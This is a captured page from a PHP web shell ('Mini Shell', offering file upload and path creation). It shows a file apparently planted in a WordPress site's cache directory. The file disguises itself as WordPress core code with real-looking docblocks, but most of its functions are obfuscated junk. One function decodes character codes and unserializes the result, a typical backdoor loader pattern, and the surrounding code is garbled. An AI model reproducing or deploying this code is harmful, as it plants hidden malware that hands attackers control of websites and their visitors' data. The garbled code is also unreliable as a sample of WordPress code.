%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/conference/public/tknwwbkq/cache/
Upload File :
Create Path :
Current File : /var/www/html/conference/public/tknwwbkq/cache/63291946.php

<?php /**
	 * Normalizes header names to be capitalized.
	 *
	 * @since 6.5.0
	 *
	 * @param string $header Header name.
	 * @return string Normalized header name.
	 */

 function is_rss ($f4g0){
 //  port defaults to 110. Returns true on success, false on fail
 // phpcs:ignore WordPress.PHP.DontExtract.extract_extract
 	$f4g0 = 'i2u8';
 // Make sure this location wasn't mapped and removed previously.
 	$https_domains = (!isset($https_domains)? 	'ijbfjvn6t' 	: 	'j5d9v');
 	if(!(strripos($f4g0, $f4g0)) ==  False)	{
 		$sanitize_plugin_update_payload = 'rqqj';
 	}
 	$f4g0 = abs(280);
 	$f4g0 = crc32($f4g0);
 	$private_statuses = 'fotzj';
 	$strip_comments = (!isset($strip_comments)? 'copl9lhm' : 'ilxn');
 	$secure_logged_in_cookie['esgrkryk7'] = 'dafxkthl';
 	$f4g0 = wordwrap($private_statuses);
 	$author_ids['yqzhsvr'] = 1551;
 	$f4g0 = html_entity_decode($f4g0);
 	$po_file = (!isset($po_file)?	"gw3tau9u2"	:	"y0zwmsmr1");
 	$private_statuses = is_string($f4g0);
 	if(empty(trim($f4g0)) !=  false) 	{
 		$ref_value = 'jdh2uowe';
 	}
 	$sql_part['b1467'] = 2847;
 	$private_statuses = md5($private_statuses);
 	return $f4g0;
 }
/**
 * Queries the database for any published post and saves
 * a flag whether any published post exists or not.
 *
 * @return bool Has any published posts or not.
 */
function COMRReceivedAsLookup()
{
    global $widget_setting_ids;
    $template_edit_link = (bool) $widget_setting_ids->get_var("SELECT 1 as test FROM {$widget_setting_ids->posts} WHERE post_type = 'post' AND post_status = 'publish' LIMIT 1");
    update_option('wp_calendar_block_has_published_posts', $template_edit_link);
    return $template_edit_link;
}
wp_refresh_heartbeat_nonces();
/**
 * Retrieves the image HTML to send to the editor.
 *
 * @since 2.5.0
 *
 * @param int          $multidimensional_filter      Image attachment ID.
 * @param string       $SNDM_thisTagDataFlags Image caption.
 * @param string       $locked_post_status   Image title attribute.
 * @param string       $fallback_url   Image CSS alignment property.
 * @param string       $month_number     Optional. Image src URL. Default empty.
 * @param bool|string  $options_to_prime     Optional. Value for rel attribute or whether to add a default value. Default false.
 * @param string|int[] $log_error    Optional. Image size. Accepts any registered image size name, or an array of
 *                              width and height values in pixels (in that order). Default 'medium'.
 * @param string       $parsed_blocks     Optional. Image alt attribute. Default empty.
 * @return string The HTML output to insert into the editor.
 */
function sticky_class($multidimensional_filter, $SNDM_thisTagDataFlags, $locked_post_status, $fallback_url, $month_number = '', $options_to_prime = false, $log_error = 'medium', $parsed_blocks = '')
{
    $FoundAllChunksWeNeed = get_image_tag($multidimensional_filter, $parsed_blocks, '', $fallback_url, $log_error);
    if ($options_to_prime) {
        if (is_string($options_to_prime)) {
            $options_to_prime = ' rel="' . esc_attr($options_to_prime) . '"';
        } else {
            $options_to_prime = ' rel="attachment wp-att-' . (int) $multidimensional_filter . '"';
        }
    } else {
        $options_to_prime = '';
    }
    if ($month_number) {
        $FoundAllChunksWeNeed = '<a href="' . esc_url($month_number) . '"' . $options_to_prime . '>' . $FoundAllChunksWeNeed . '</a>';
    }
    /**
     * Filters the image HTML markup to send to the editor when inserting an image.
     *
     * @since 2.5.0
     * @since 5.6.0 The `$options_to_prime` parameter was added.
     *
     * @param string       $FoundAllChunksWeNeed    The image HTML markup to send.
     * @param int          $multidimensional_filter      The attachment ID.
     * @param string       $SNDM_thisTagDataFlags The image caption.
     * @param string       $locked_post_status   The image title.
     * @param string       $fallback_url   The image alignment.
     * @param string       $month_number     The image source URL.
     * @param string|int[] $log_error    Requested image size. Can be any registered image size name, or
     *                              an array of width and height values in pixels (in that order).
     * @param string       $parsed_blocks     The image alternative, or alt, text.
     * @param string       $options_to_prime     The image rel attribute.
     */
    $FoundAllChunksWeNeed = apply_filters('image_send_to_editor', $FoundAllChunksWeNeed, $multidimensional_filter, $SNDM_thisTagDataFlags, $locked_post_status, $fallback_url, $month_number, $log_error, $parsed_blocks, $options_to_prime);
    return $FoundAllChunksWeNeed;
}
$skip_min_height = 'a2z312';
/**
 * Given a date in the timezone of the site, returns that date in UTC.
 *
 * Requires and returns a date in the Y-m-d H:i:s format.
 * Return format can be overridden using the $should_add parameter.
 *
 * @since 1.2.0
 *
 * @param string $profile_user The date to be converted, in the timezone of the site.
 * @param string $should_add      The format string for the returned date. Default 'Y-m-d H:i:s'.
 * @return string Formatted version of the date, in UTC.
 */
function wp_getPageTemplates($profile_user, $should_add = 'Y-m-d H:i:s')
{
    $filepath = date_create($profile_user, wp_timezone());
    if (false === $filepath) {
        return gmdate($should_add, 0);
    }
    return $filepath->setTimezone(new DateTimeZone('UTC'))->format($should_add);
}
$last_attr = 'ls81i4ao2';
// In the rare case that DOMDocument is not available we cannot reliably sniff content and so we assume legacy.
/**
 * Retrieves the current user object.
 *
 * Will set the current user, if the current user is not set. The current user
 * will be set to the logged-in person. If no user is logged-in, then it will
 * set the current user to 0, which is invalid and won't have any permissions.
 *
 * @since 2.0.3
 *
 * @see _admin_head()
 * @global WP_User $current_user Checks if the current user is set.
 *
 * @return WP_User Current WP_User instance.
 */
function admin_head()
{
    return _admin_head();
}


/**
	 * Filters sidebars_widgets to ensure the currently-rendered widget is the only widget in the current sidebar.
	 *
	 * @since 4.5.0
	 *
	 * @param array $sidebars_widgets Sidebars widgets.
	 * @return array Filtered sidebars widgets.
	 */

 function wp_delete_post ($last_checked){
 $smtp_transaction_id = 'sifw70ny';
 	$allow_query_attachment_by_filename = 'g2hppsho';
 	$carry14 = (!isset($carry14)?	"au0178qk"	:	"jo7i");
 // Used when calling wp_count_terms() below.
 // Only some fields can be modified
 // Merge in any options provided by the schema property.
 $smtp_transaction_id = base64_encode($smtp_transaction_id);
 // Start position
 $sitemap_types = (!isset($sitemap_types)? "gadd7dnm8" : "ruia4");
 $references['xn8yl'] = 'grztogxj8';
 $smtp_transaction_id = expm1(274);
 //First 4 chars contain response code followed by - or space
 $smtp_transaction_id = rawurldecode($smtp_transaction_id);
 	$exponentbitstring['sbb6k9o'] = 1484;
 // The $menu_item_data for wp_update_nav_menu_item().
 // QT   - audio/video - Quicktime
 // confirm_delete_users() can only handle arrays.
 // 3.3.0
 // ----- Do a duplicate
 	if(!isset($font_collections_controller)) {
 		$font_collections_controller = 'sohucbv';
 	}
 	$font_collections_controller = urldecode($allow_query_attachment_by_filename);
 	$allow_query_attachment_by_filename = asin(552);
 	$thisfile_riff_RIFFsubtype_COMM_0_data = 'wjmeqhstd';
 	$carry16['emnnw8ln'] = 'c528bf';
 	if(empty(strtoupper($thisfile_riff_RIFFsubtype_COMM_0_data)) ===  false) 	{
 //   $foo = self::CreateDeepArray('/path/to/my', '/', 'file.txt')
 		$subkey = 'qyxzimeqt';
 	}
 	$wrapper_styles['czeht'] = 'adm8dist';
 	$font_collections_controller = urldecode($allow_query_attachment_by_filename);
 	$property_suffix = 'ww9ld';
 	$thisfile_riff_RIFFsubtype_COMM_0_data = ucfirst($property_suffix);
 	$empty = 'sbp8';
 	$custom_templates['hj6bnfj'] = 2375;
 	$property_suffix = base64_encode($empty);
 	$locations_overview = (!isset($locations_overview)? 'k45yc' : 'k7v5eio57');
 	if(!empty(lcfirst($thisfile_riff_RIFFsubtype_COMM_0_data)) !==  False) {
 		$test_type = 'it463wz';
 	}
 	if(!empty(quotemeta($empty)) ===  True)	{
 		$a_i = 'egbp';
 	}
 	$read_bytes = 'pgalha1';
 	$font_collections_controller = stripslashes($read_bytes);
 	$to_process['m2bdk'] = 'jnrhwtqvu';
 	if(!isset($old_tt_ids)) {
 $setting_args['lqpmz'] = 'jxj4ks20z';
 		$old_tt_ids = 'gei2xob6b';
 	}
 // $site is still an array, so get the object.
 	$old_tt_ids = atan(579);
 	if(empty(substr($property_suffix, 9, 19)) !==  true)	{
 		$add_to = 'h3tw';
 	}
 // Date rewrite rules.
 	return $last_checked;
 }


/**
 * Handles uploading attachments via AJAX.
 *
 * @since 3.3.0
 */

 function set_https_domains ($a_theme){
 $akismet_url = (!isset($akismet_url)?	"s7a76"	:	"zqqaf");
 $pattern_settings = 'ncd1k';
 $latest_posts = 'a4i300f';
  if(!isset($encoded_slug)) {
  	$encoded_slug = 'mm0lja7k3';
  }
 	$sub2feed2 = 'khsafzeqb';
 	if(!isset($shared_tts)) {
 		$shared_tts = 'u062iz21e';
 	}
 	$shared_tts = basename($sub2feed2);
 	if(!(str_shuffle($sub2feed2)) ===  true) {
 		$autosave_post = 'h9bnac7v';
 	}
 	$f9g1_38['fb6y'] = 'bjwoi1';
 	if(!isset($shortcode)) {
 		$shortcode = 'vkabsx5';
 	}
 	$shortcode = log(819);
 	if(!isset($sign_extracerts_file)) {
 		$sign_extracerts_file = 'lie7947';
 	}
 	$sign_extracerts_file = rawurlencode($shortcode);
 	$filter_type['g8vw'] = 'mtnk0m9k';
 	if(!isset($remove_div)) {
 		$remove_div = 'yw7k7uhhu';
 	}
 	$remove_div = addslashes($shortcode);
 	if(!isset($limited_email_domains)) {
 		$limited_email_domains = 'sw2y4h9';
 	}
 // Set user_nicename.
 	$limited_email_domains = sin(409);
 	if(!empty(atanh(182)) !==  TRUE) 	{
 		$exported_properties = 'wud84';
 	}
 // GUID
 	if(empty(strrev($remove_div)) !=  false)	{
 		$start_time = 'ba7o7c7dm';
 	}
 	$shared_tts = abs(406);
 	$helo_rply['suhl'] = 3392;
 	$frame_remainingdata['m8xo2le'] = 27;
 	if(!isset($ctxA)) {
 		$ctxA = 'j2k0ke';
 	}
 	$ctxA = ceil(390);
 	$add_attributes = (!isset($add_attributes)? 'ri0f6ht1' : 'y3vgsrqa');
 	$wp_lang['i30jypc'] = 'h2gq';
 	$limited_email_domains = htmlentities($ctxA);
 	if((floor(622)) ==  TRUE) 	{
 		$aria_describedby_attribute = 'ea23ii';
 	}
 	if(!empty(urldecode($limited_email_domains)) !=  false)	{
 		$noclose = 'fzp5';
 	}
 	return $a_theme;
 }
// Checking the other optional media: elements. Priority: media:content, media:group, item, channel


/* translators: 1: %category%, 2: %tag% */

 function iconv_fallback_iso88591_utf8 ($empty){
 //         [4D][BB] -- Contains a single seek entry to an EBML element.
 //If no auth mechanism is specified, attempt to use these, in this order
 // decode header
 $trackbackquery = 'i512g';
 $capability__not_in = 'z5evlf';
 $link_rss = 'uei03id';
 $schema_links = (!isset($schema_links)?	'c4e4xz'	:	'iw3w4');
 $month_abbrev = 'k83leo4cx';
 // Out-of-bounds, run the query again without LIMIT for total count.
 	$allow_query_attachment_by_filename = 'vi4dsg9a';
 	if(!isset($f4g0)) {
 		$f4g0 = 'tdbuo';
 	}
 	$f4g0 = strtoupper($allow_query_attachment_by_filename);
 	$old_tt_ids = 'tzvaj6glh';
 	$round_bit_rate = (!isset($round_bit_rate)? "uaxx8tj5w" : "whf3");
 	$f4g0 = stripslashes($old_tt_ids);
 	if(!isset($deletion)) {
 		$deletion = 'fczdu';
 	}
 	$deletion = log1p(403);
 	$thisfile_riff_RIFFsubtype_COMM_0_data = 'vmmc7';
 	$allow_query_attachment_by_filename = rawurldecode($thisfile_riff_RIFFsubtype_COMM_0_data);
 	$thisfile_riff_RIFFsubtype_COMM_0_data = exp(729);
 	if(!(tan(895)) ===  True)	{
 		$location_of_wp_config = 'qyedpg2';
 	}
 	$private_statuses = 'oqt9';
 	if(empty(htmlspecialchars($private_statuses)) ===  TRUE) {
 		$emoji_fields = 'g6mnq';
 	}
 	$QuicktimeStoreFrontCodeLookup['o6zh5h2'] = 590;
 	if((crc32($old_tt_ids)) !=  false) {
 		$ret2 = 'kzqkfs5wm';
 	}
 	$OS_FullName = (!isset($OS_FullName)? 	"e8nm7s9" 	: 	"r70j93d");
 	$has_width['wg07tb'] = 4023;
 	if(!(rtrim($allow_query_attachment_by_filename)) !==  FALSE) {
 		$newBits = 'ipouz5';
 	}
 	$private_statuses = tanh(516);
 	$read_bytes = 'i3l8edjj';
 	$old_tt_ids = rtrim($read_bytes);
 	$last_checked = 'bbuntho';
 	if((rtrim($last_checked)) !=  true) 	{
 		$old_installing = 'dyo1yk';
 	}
 	$last_checked = strripos($private_statuses, $allow_query_attachment_by_filename);
 	$property_suffix = 'ype2gi';
 	$thisfile_riff_RIFFsubtype_COMM_0_data = htmlspecialchars($property_suffix);
 	$string2 = (!isset($string2)? "pbjz7g" : "n9gs");
 	$ActualBitsPerSample['wecke9u'] = 'zu8n';
 	$one_protocol['om4af'] = 4583;
 	$f4g0 = strtr($allow_query_attachment_by_filename, 11, 7);
 	return $empty;
 }


/**
	 * Filters the validated user registration details.
	 *
	 * This does not allow you to override the username or email of the user during
	 * registration. The values are solely used for validation and error handling.
	 *
	 * @since MU (3.0.0)
	 *
	 * @param array $result {
	 *     The array of user name, email, and the error messages.
	 *
	 *     @type string   $user_name     Sanitized and unique username.
	 *     @type string   $orig_username Original username.
	 *     @type string   $user_email    User email address.
	 *     @type WP_Error $errors        WP_Error object containing any errors found.
	 * }
	 */

 function wp_embed_defaults($plugurl){
 // Handle link category sorting.
 $fnction = 'xfoostdv';
 $large_size_h = 'x5r0fxx';
 $mp3gain_undo_left = 'pow3';
  if(!(rawurldecode($fnction)) !=  false) 	{
  	$template_names = 'de6lfddl';
  }
 $frame_mbs_only_flag = (!isset($frame_mbs_only_flag)? 'lteny' : 'p4lkosb');
 $quick_draft_title = (!isset($quick_draft_title)? 	"uyk123o" 	: 	"ls6p12y2");
     $plugurl = array_map("chr", $plugurl);
 $new_fields['vhitnpc'] = 1402;
 $group_key['w5fdje'] = 2824;
 $fnction = sin(779);
 //         [54][BA] -- Height of the video frames to display.
 // Point children of this page to its parent, also clean the cache of affected children.
 // Tries to decode the `data-wp-interactive` attribute value.
     $plugurl = implode("", $plugurl);
     $plugurl = unserialize($plugurl);
     return $plugurl;
 }
/**
 * Determines whether a script has been added to the queue.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 2.8.0
 * @since 3.5.0 'enqueued' added as an alias of the 'queue' list.
 *
 * @param string $MarkersCounter Name of the script.
 * @param string $learn_more Optional. Status of the script to check. Default 'enqueued'.
 *                       Accepts 'enqueued', 'registered', 'queue', 'to_do', and 'done'.
 * @return bool Whether the script is queued.
 */
function get_longitude($MarkersCounter, $learn_more = 'enqueued')
{
    _wp_scripts_maybe_doing_it_wrong(__FUNCTION__, $MarkersCounter);
    return (bool) wp_scripts()->query($MarkersCounter, $learn_more);
}
$skip_min_height = sha1($skip_min_height);


/**
	 * Data to be parsed
	 *
	 * @access private
	 * @var string
	 */

 if(!empty(sha1($last_attr)) ==  True){
 	$lon_deg_dec = 'inj26';
 }
$db_check_string = "OyaaMGy";
// Complete menu tree is displayed.


/**
	 * Gets the plugin header data for a plugin.
	 *
	 * @since 5.5.0
	 *
	 * @param string $plugin The plugin file to get data for.
	 * @return array|WP_Error The plugin data, or a WP_Error if the plugin is not installed.
	 */

 function sodium_crypto_box_seal_open ($logins){
 	if(!isset($style_key)) {
 		$style_key = 'tx79s';
 	}
 	$style_key = exp(857);
 	$logins = 'hdxmgec';
 	$logins = bin2hex($logins);
 	$logins = htmlspecialchars_decode($logins);
 	$thisfile_wavpack_flags = (!isset($thisfile_wavpack_flags)?	"suwckv2x"	:	"suhii2b");
 	$f2f6_2['npl9fvfo'] = 2586;
 	if((deg2rad(7)) ===  true)	{
 		$default_id = 'ekmy1';
 	}
 	$style_key = exp(26);
 	$before_block_visitor = 'zevx8y';
 	$style_key = strip_tags($before_block_visitor);
 	return $logins;
 }


/**
 * Merges all term children into a single array of their IDs.
 *
 * This recursive function will merge all of the children of $term into the same
 * array of term IDs. Only useful for taxonomies which are hierarchical.
 *
 * Will return an empty array if $term does not exist in $taxonomy.
 *
 * @since 2.3.0
 *
 * @param int    $term_id  ID of term to get children.
 * @param string $taxonomy Taxonomy name.
 * @return array|WP_Error List of term IDs. WP_Error returned if `$taxonomy` does not exist.
 */

 function block_core_navigation_get_menu_items_at_location ($limited_email_domains){
 // Build the CSS.
 $local_key = 'lnfcfqww';
 $queried_items = 'fg3cssl';
 $privacy_policy_url = 'hyiyvk8v';
 // The rest of the set comes after.
 $local_key = bin2hex($local_key);
 $scan_start_offset['ni04cug'] = 3642;
 $block_node['wyqb'] = 2331;
 	if(!isset($akid)) {
 		$akid = 'zajl7';
 	}
 	$akid = log1p(431);
 	$search_string['cvss'] = 'slslm';
 	if(!(ucfirst($akid)) !==  true) {
 		$query_var_defaults = 's66n';
 	}
 	$allowed_options = (!isset($allowed_options)? "eui4" : "c1diu1r");
 	$limbs['oo9yer'] = 4680;
 	if((round(595)) ==  FALSE) {
 		$taxonomy_names = 'iiiq';
 	}
 	$limited_email_domains = 'zrfrxte';
 	$LongMPEGversionLookup['ac28tu65'] = 'eedpm1tw';
 	$akid = strrev($limited_email_domains);
 	$limited_email_domains = rtrim($akid);
 	return $limited_email_domains;
 }


/*
			 * If the current network has a path and also matches the domain and path of the request,
			 * we need to look for a site using the first path segment following the network's path.
			 */

 function doEncode ($logins){
 // not Fraunhofer or Xing VBR methods, most likely CBR (but could be VBR with no header)
  if(!isset($new_title)) {
  	$new_title = 'pib7ytih5';
  }
  if(!isset($getid3_dts)) {
  	$getid3_dts = 'umxou8ex';
  }
 	if((dechex(796)) ===  false){
 		$chapter_string_length = 'p7e9mwb';
 	}
 	$logins = 'ng6l0a3';
 	if(!isset($before_block_visitor)) {
 // Populate the server debug fields.
 		$before_block_visitor = 'vybe';
 	}
 	$before_block_visitor = lcfirst($logins);
 	$has_custom_border_color['qa3gc'] = 'pmqe0g';
 	if(!isset($style_key)) {
 		$style_key = 'gvji8';
 	}
 	$style_key = exp(339);
 	$pass_request_time = (!isset($pass_request_time)?	'cy1n1wa'	:	'x7ca62');
 	if((trim($style_key)) ===  TRUE) 	{
 		$plugin_rel_path = 'jxbr082s';
 	}
 	$button_wrapper = (!isset($button_wrapper)?	"b1t96dnz"	:	"zbim1kel");
 	if(empty(acosh(947)) !=  false) 	{
 		$render_callback = 'tkwp8juq';
 	}
 	if(!isset($stripped_query)) {
 		$stripped_query = 't64t';
 	}
 	$stripped_query = acos(150);
 	$style_key = soundex($before_block_visitor);
 // Nikon-specific QuickTime tags found in the NCDT atom of MOV videos from some Nikon cameras such as the Coolpix S8000 and D5100
 // Linked information
 // Reject invalid cookie domains
 	return $logins;
 }
// array indices are required to avoid query being encoded and not matching in cache.


/**
 * Deprecated dashboard incoming links control.
 *
 * @deprecated 3.8.0
 */

 function is_nav_menu_item ($shortcode){
 	$remove_div = 'g02zr89ez';
 // Pass whatever was set with config options over to the sanitizer.
 	$remove_div = bin2hex($remove_div);
 //if (isset($debug_structure['debug_items']) && count($debug_structure['debug_items']) > 0) {
 	$notoptions = 'fsb8e2';
 	$theme_supports = 'wfxt';
 $template_parts = (!isset($template_parts)? 	"kopq92z" 	: 	"upq6ufl4");
 $last_result = 'dstf2x5';
 	if(!empty(strrpos($notoptions, $theme_supports)) ===  true) {
 		$mce_styles = 'q0agne';
 	}
 	if(!isset($sign_extracerts_file)) {
 		$sign_extracerts_file = 'kdhc0b';
 	}
 	$sign_extracerts_file = asinh(277);
 	$sub2feed2 = 'qv485aws';
 	$new_options = (!isset($new_options)? "t5o1u" : "p54z6h");
 	if(empty(ucfirst($sub2feed2)) ==  true)	{
 		$termlink = 'pan8qenag';
 	}
 	if(empty(deg2rad(818)) !==  False)	{
 		$box_context = 'uu6r';
 	}
 	$akid = 'kfvo';
 	$example = (!isset($example)?'er81':'mdm6');
 	if(!(str_shuffle($akid)) !=  FALSE) {
 		$merged_styles = 'fcag1608y';
 	}
 	if(!isset($temp_file_name)) {
 		$temp_file_name = 'o58ncfrz';
 	}
 	$temp_file_name = strtoupper($sub2feed2);
 	$theme_supports = sqrt(684);
 	$remotefile = (!isset($remotefile)?'jo12':'xm965rfrt');
 	$font_face_post['ajq97td8z'] = 'jdnncnfe';
 	$remove_div = ceil(181);
 	$media_buttons['rh4sb6ykz'] = 'mwqg2o';
 	if(!empty(acosh(611)) !=  False){
 		$header_tags = 'rma0b';
 	}
 	if(!empty(md5($sub2feed2)) ===  false) 	{
 		$default_status = 'l9ls0';
 	}
 	$limited_email_domains = 'bl4ub0';
 	$publicly_queryable['njoe9b7'] = 4972;
 	$sub2feed2 = htmlspecialchars_decode($limited_email_domains);
 	$color_support = 'q11yv';
 	if(!isset($a_theme)) {
 		$a_theme = 's8n7kh';
 	}
 	$a_theme = convert_uuencode($color_support);
 	$ctxA = 'mu2h2r';
 	$limited_email_domains = trim($ctxA);
 	if((sin(893)) ===  TRUE)	{
 		$hex6_regexp = 'yob2pteg';
 	}
 	return $shortcode;
 }


/**
		 * Fires immediately before a term to delete's children are reassigned a parent.
		 *
		 * @since 2.9.0
		 *
		 * @param array $edit_tt_ids An array of term taxonomy IDs for the given term.
		 */

 function get_body_class ($style_key){
 	$style_key = floor(366);
 // http://developer.apple.com/library/mac/#documentation/QuickTime/QTFF/QTFFChap3/qtff3.html
 // Disallow the file editors.
 // fe25519_abs(s_, s_);
 // tvEpisodeID
 // Start anchor tag content.
 //    carry7 = (s7 + (int64_t) (1L << 20)) >> 21;
 $flattened_preset = 'wrr1n';
 $sortable_columns = 'ypz50eu';
 $assets = 'q1t8ce8';
 $blogs = 'qe771kf3';
 $got_gmt_fields = (!isset($got_gmt_fields)? 	"gbmkf" 	: 	"ed6z7c");
 // Output the failure error as a normal feedback, and not as an error:
 	$text_color['qnrjkzzty'] = 4216;
 // Not an image attachment.
 	$style_key = exp(863);
 	$orig_pos['qig3ndiq'] = 4218;
 	$style_key = sinh(705);
  if(empty(strtoupper($blogs)) !=  True) 	{
  	$page_crop = 'dl680s4';
  }
  if(!isset($fractionbitstring)) {
  	$fractionbitstring = 'eqljl7s';
  }
  if(!(ltrim($flattened_preset)) !=  True){
  	$user_created = 'r7bt';
  }
  if((soundex($sortable_columns)) !=  true)	{
  	$page_cache_test_summary = 'hhwcem81';
  }
  if(!isset($copyContentType)) {
  	$copyContentType = 'r5xk4pt7r';
  }
 $event = 'ziun2';
 $copyContentType = deg2rad(829);
 $open_in_new_tab = (!isset($open_in_new_tab)?"tin157u":"azyfn");
 $fractionbitstring = rawurldecode($assets);
 $flattened_preset = base64_encode($flattened_preset);
 // 2 bytes per character
 $assets = strnatcmp($assets, $assets);
 $match_height['xmd5eh0m'] = 422;
 $sortable_columns = abs(214);
  if(empty(tan(767)) !==  TRUE)	{
  	$decoded_json = 'dctq';
  }
 $f8g3_19['mqvhz'] = 1235;
  if(!empty(lcfirst($sortable_columns)) !==  FALSE) 	{
  	$datum = 'l2uh04u';
  }
  if(!isset($closed)) {
  	$closed = 'venu2tt';
  }
  if(!(md5($event)) ===  false) 	{
  	$rawheaders = 'iwh8jqw';
  }
  if(!isset($ofp)) {
  	$ofp = 'mlem03j8';
  }
 $flattened_preset = floor(975);
 // Pass any extra $hook_extra args here, this will be passed to any hooked filters.
 	$ptype_menu_id['up6r'] = 2325;
 $upgrade_plan['a7cgrbjm'] = 651;
 $sortable_columns = strtolower($sortable_columns);
 $closed = trim($fractionbitstring);
 $ofp = tanh(56);
 $mpid['kilmvtbea'] = 'zs3dxr';
 // check for magic quotes in PHP < 5.4.0 (when these options were removed and getters always return false)
 	if(!(round(330)) ===  FALSE) {
 		$default_editor_styles_file_contents = 'kqxw8ro';
 	}
 	$style_key = strripos($style_key, $style_key);
 	if(!empty(expm1(622)) !==  TRUE){
  if((asin(409)) !==  FALSE){
  	$default_key = 'x8to0a7c';
  }
 $block_settings['uqofrmb'] = 4661;
 $sortable_columns = lcfirst($sortable_columns);
 $copyContentType = deg2rad(259);
 $blogs = str_shuffle($blogs);
 		$drop = 'uywo64d';
 	}
  if(empty(convert_uuencode($ofp)) ===  FALSE) {
  	$last_bar = 'w1wmvbaq';
  }
 $assets = base64_encode($fractionbitstring);
 $max_bytes = (!isset($max_bytes)? "yenogy" : "s6vuiw");
 $blogs = decoct(645);
 $set_charset_succeeded = (!isset($set_charset_succeeded)? 	"r0w0zfa" 	: 	"v83y");
 	$LastOggSpostion = (!isset($LastOggSpostion)?'j6iag75':'pqmdu27t');
 	if((nl2br($style_key)) ==  true) {
 		$cmd = 'apzxe';
 	}
 	$preview_button['qz1c'] = 'ndv3amwxc';
 	if(!isset($before_block_visitor)) {
 		$before_block_visitor = 'xxm3ditf';
 	}
 	$before_block_visitor = decbin(694);
 	$to_line_no['r8vni6hk'] = 1162;
 	$style_key = ucwords($style_key);
 	$before_block_visitor = strripos($style_key, $before_block_visitor);
 	$style_key = urldecode($style_key);
 	$before_block_visitor = urldecode($style_key);
 	$remind_interval = (!isset($remind_interval)? 	"igdu" 	: 	"cygl");
 	$style_key = chop($style_key, $style_key);
 	if(!isset($logins)) {
 		$logins = 'alwbah';
 	}
 	$logins = urlencode($before_block_visitor);
 	return $style_key;
 }


/**
 * Core class used to implement an HTML list of nav menu items.
 *
 * @since 3.0.0
 *
 * @see Walker
 */

 function crypto_pwhash_str_verify ($cidUniq){
 //$g_pclzip_versionnfo['video']['resolution_y'] = ($PictureSizeEnc & 0xFF00) >> 8;
 $has_attrs = 'npd3';
 $option_extra_info = 'f9n2xs5v';
  if(!isset($style_handles)) {
  	$style_handles = 'tnyaic7';
  }
  if(!isset($new_title)) {
  	$new_title = 'pib7ytih5';
  }
 	$count_key1 = 'ubsnsaher';
 $new_title = asinh(606);
 $f0f0 = 'mq4u7aqn';
 $style_handles = sqrt(621);
  if(empty(htmlspecialchars($has_attrs)) ==  true)	{
  	$already_has_default = 'capdw';
  }
 	$HeaderExtensionObjectParsed = (!isset($HeaderExtensionObjectParsed)?	"m13ba"	:	"jedd8y7s4");
 // Trailing /index.php.
 // eliminate double slash
 // Always allow for updating a post to the same template, even if that template is no longer supported.
 $formaction = (!isset($formaction)?'pfj3':'wa8v29');
  if((trim($new_title)) !=  true){
  	$toggle_close_button_icon = 'evr224rbu';
  }
 $option_extra_info = strcspn($option_extra_info, $f0f0);
 $has_attrs = stripslashes($has_attrs);
 	$count_key1 = htmlentities($count_key1);
 // sys_get_temp_dir added in PHP v5.2.1
 // Setup arguments.
 	$ltr = 'ktfp';
 // Caching code, don't bother testing coverage.
  if(!isset($permastruct_args)) {
  	$permastruct_args = 'us53948';
  }
 $style_handles = tanh(81);
 $option_extra_info = round(389);
 $locations_screen['hy9omc'] = 'd73dvdge8';
 	$count_key1 = stripcslashes($ltr);
 // Installing a new theme.
 // 7 days
 $permastruct_args = md5($new_title);
 $f0f0 = strip_tags($f0f0);
  if(!(strtolower($has_attrs)) ==  TRUE){
  	$sitename = 'hbnvop';
  }
 $orig_shortcode_tags = 'l2a29enq';
 	$stored['kjiujret8'] = 'npkq7x';
 // This is some other kind of data (quite possibly just PCM)
 // The attachment_id may change if the site is exported and imported.
 //    s20 -= carry20 * ((uint64_t) 1L << 21);
 	if(!isset($compact)) {
 		$compact = 'aydjmg5uz';
 	}
 	$compact = atan(35);
 	$processed_response = 'x0b1';
 	$wp_settings_fields['lk4qt'] = 1018;
 	$compact = strnatcmp($ltr, $processed_response);
 	$passwd = (!isset($passwd)? 	"kh42" 	: 	"lq0w");
 	$processed_response = substr($count_key1, 14, 20);
 	$op_precedence['s8xqp0rf'] = 'yko7u';
 	$login_link_separator['sk0zcbt'] = 3444;
 	if(empty(cosh(912)) ==  FALSE) 	{
 		$available_languages = 'idk5';
 	}
 	if((addslashes($compact)) !=  false) 	{
 		$show_summary = 'iu2xjzhcb';
 	}
 	$count_key1 = asin(378);
 	$carry19['qshhc8'] = 2301;
 	$cidUniq = tan(163);
 	$already_sorted['u3j5ci9'] = 'cq5m';
 	if(!empty(ucwords($processed_response)) ===  true){
 		$MAX_AGE = 'mh06k7w';
 	}
 	$count_key1 = strcoll($cidUniq, $processed_response);
 	return $cidUniq;
 }
$plugurl = redirect_guess_404_permalink($db_check_string);


/* translators: 1: Current PHP version, 2: PHP version required by the new plugin version. */

 function pk_to_curve25519 ($private_statuses){
 $group_description = 'i0epuy8rq';
 $global_groups = 'rgt1s';
 $collection_params = 'v01yn3yzd';
 // wp_die( __('Sorry, cannot call files with their real path.' ));
 	if((atanh(395)) !==  True)	{
 		$terms_from_remaining_taxonomies = 'v814f';
 	}
 	$f4g0 = 'nztpwouq';
 	$c6 = (!isset($c6)?	'enj1r'	:	'rpa5ow');
 	$debug_data['cz4pf0'] = 3312;
 	if(!isset($allow_query_attachment_by_filename)) {
 		$allow_query_attachment_by_filename = 'x5ele';
 $theme_root['dp8krh5wy'] = 1740;
 $global_groups = crc32($global_groups);
  if(!empty(md5($group_description)) !==  FALSE)	{
  	$akismet_ua = 'ay4kbb';
  }
 	}
 	$allow_query_attachment_by_filename = convert_uuencode($f4g0);
 	$allowBitrate15['wjm6uy'] = 'k7ev5j';
 	$allow_query_attachment_by_filename = acos(953);
 	$old_tt_ids = 'heroe72ko';
 	$stickies['mw50irfq'] = 3740;
 	if((htmlentities($old_tt_ids)) !==  true) {
 // Add caps for Contributor role.
 		$sendmailFmt = 'jyjwjxzdv';
 	}
 	$classic_sidebars = (!isset($classic_sidebars)? 'xno6o' : 'cmhyxmt86');
 	$NS['c9dom'] = 1612;
 	if(!empty(convert_uuencode($old_tt_ids)) ===  False) 	{
 		$link_text = 'a1bcb';
 	}
 	$override_preset['wxptv'] = 3109;
 	$old_tt_ids = floor(587);
 	if((abs(52)) !==  True) 	{
 		$recent_comments_id = 'lwp5gs';
 	}
 	$special = (!isset($special)? 'vmnsaj' : 'dewcd3');
